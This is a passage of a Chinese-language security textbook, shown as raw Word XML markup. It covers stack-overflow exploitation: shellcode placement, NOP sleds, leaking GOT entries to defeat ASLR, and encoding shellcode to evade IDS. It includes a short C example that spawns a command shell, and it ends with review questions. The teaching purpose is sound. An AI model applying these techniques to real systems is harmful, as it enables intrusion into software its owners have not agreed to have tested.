    </w:p>
    <w:p w14:paraId="12C9451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w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>合理利用缓冲区，使攻击串的总长度减小:对于远程攻击，有时所有数据必须包含在一个数据包中!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6C0993"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对程序破坏小，比较稳定:溢出基本发生在当前栈帧内，不会大范围破坏前栈帧。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B8292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w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当然，即便是使用跳转指令来定位shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也可以把缓冲区布置</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>到函数返回地址之前</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>只需要</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在返回地址之后再多</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>覆盖一些空间</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，并在那里布置一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>跳转到缓冲区内的指令，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>引导处理器</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>去执行shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3110052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另外，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>抬高栈顶</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>来保护</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有时也是必要的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。函数返回时，当前栈帧被弹出，这时缓冲区位于栈顶ESP之上的内存区域。在弹出栈帧时只是改变了ESP寄存器中的值，逻辑上，ESP以上的内存空间的数据已经作废；物理上，这些数据并没有被销毁。如果shellcode中没有压栈指令向栈中写入数据还没有太大影响；但如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用push指令在栈中暂存数据，压栈数据很可能会破坏到shellcode本身。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所以，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当缓冲区相对shellcode 较大时，把shellcode布置在缓冲区的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>较低内存处，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这时shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>底部</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>离栈顶较远，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>push操作破坏shellcode的可能性就会降低。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA27B4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个别有苛刻的限制条件的漏洞不允许我们使用跳转指令精确定位shellcode,而使用shellcode的静态地址来覆盖又不够准确，这时我们可以做一个折中：如果能够淹没大片的内存区域，可以将shellcode布置在一大段nop之后。这时定位shellcode时，只要能跳进这一大片nop中，shellcode就可以最终得到执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A60A2B8"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 xml:space="preserve">2.8.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>定位API的原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784F48B4"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在exploit的过程总是会用到一些API，如puts、printf、system、exec系列函数等等。这些API都在动态链接库里面，当程序加载到内存时，会动态的加载这些库函数，一般加载的位置都是随机的。如果ALSR没有开启，那么对于特定动态库版本的特定API的位置也就是固定的了，此时定位API就相对容易。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A515C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但当ALSR开启后，动态链接库加载的基地址将不可确定，此时就需要动态的确定这个基址，然后才能通过偏移量来找到想要的API的地址。在Linux系统下寻找特定API的地址的方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C406A6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（1）分析程序使用了哪些API。程序在调用API之前，.got</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>plt表中对应项存放的是动态获取这个API地址的代码片段的地址，执行完这个API后，.got</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>plt表中对应项存放的将是API的起始地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3EAA5C"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（2）在程序调用某个API后泄露它对应的.got</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>plt表项。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751A8D6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（3）分析加载的动态链接库文件，得到这个API在文件中的偏移，再结合（2）的结果，就可以得到进程中加载库的基地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B047C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（4）通过目标API在库文件中的偏移量和基地址，计算出目标API的地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BE1AD3"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2.8.5 shellcode编码技术</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F17C45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在很多漏洞利用场景中，shellcode 的内容将会受到限制。首先，所有的字符串函数都会对NULL字节进行限制。通常我们需要选择特殊的指令来避免在shellcode中直接出现0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>x0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0字节或字</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其次，有些函数还会要求shellcode 必须为可见字符的ASCI值或Unicode值。在这种限制较多的情况下，如果仍然通过挑选指令的办法控制shellcode的值的话，将会给开发带来很大困难。毕竟用汇编语言写程序就已经不那么容易了</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最后，除了以上提到的软件自身的限制之外，在进行网络攻击时，基于特征的IDS系统往往也会对常见的shellcode进行拦截。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD4974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那么，怎样突破重重防护，把shellcode从程序接口安全地送入堆栈呢？一个比较容易想到的办法就是给shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以先专心完成shellcode的逻辑，然后使用编码技术对shellcode 进行编码，使其内容达到限制的要求，最后再精心构造十几个字节的解码程序，放在shellcode开始执行的地方。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBC2575"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当exploit成功时，shellcode 顶端的解码程序首先运行，它会在内存中将真正的shellcode还原成原来的样子，然后</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>再执行shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。这种对shellcode编码的方法和软件加壳的原理非常类似。这样，我们只需要专注于几条解码指令</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使其符合限制条件就行</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相对于直接关注于整段shellcode来说使问题简化了很多。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF5C8DB" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="000012A0" w:rsidRDefault="002C1A85" w:rsidP="000012A0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.8.6 shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>编写实例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63273ABF"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最后介绍一下编写shellcode的方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73058C4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（1）首先通过高级语言编写具有攻击功能的程序：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E33FEF"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代码2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">.22 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>攻击代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471879E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w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nt main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1108A69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13EB1638"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LoadLibrary(“msvcrt.dll”);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC01A64"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system(“command.com”);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C14313"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return 0;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0136F41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（2）编译并查看对应的汇编程序：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343ED512"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173418D1" wp14:editId="44A8C32C">
            <wp:extent cx="4637744" cy="1886701"/>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4636" cy="1901709"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6980EEA7" w14:textId="528A7451"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.3</w:t>
      </w:r>
      <w:r w:rsidR="00715DC2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对应的汇编代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12505D3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（3）然后从内存中找到对应的代码段，拷贝出二进制代码作为初步的shellcode：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3014CF5D" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19544022" wp14:editId="502D2753">
            <wp:extent cx="4345115" cy="1754577"/>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43">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4381065" cy="1769094"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2963E818" w14:textId="3D1D27D7" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r w:rsidR="00715DC2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>恶意代码对应的二进制形式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CBBB3B"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得到的初步的shellcode有很多问题：没有上下文环境；没有正确的堆栈；所需的字符串在目标程序中的位置；目标进程中API的对应地址等等。所以，需要通过之前提到的一些手段来完善shellcode：在shellcode中构造变量来存储常量字符串，从漏洞程序中定位API的地址，调用函数时直接使用c</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>指令跳转到对应位置，如果目标程序开启了防护机制，shellcode还要做出相应的对策。最后还要通过编码来隐藏恶意代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADAB075" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="001E452E" w:rsidRDefault="002C1A85" w:rsidP="000012A0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E452E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>思考题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B0533D"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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）系统中运行的进程按照内存中存放的数据类型来分类，大致可以分为哪几种区域？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71764A16"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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>节中的代码实例使用的函数调用类型是_</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
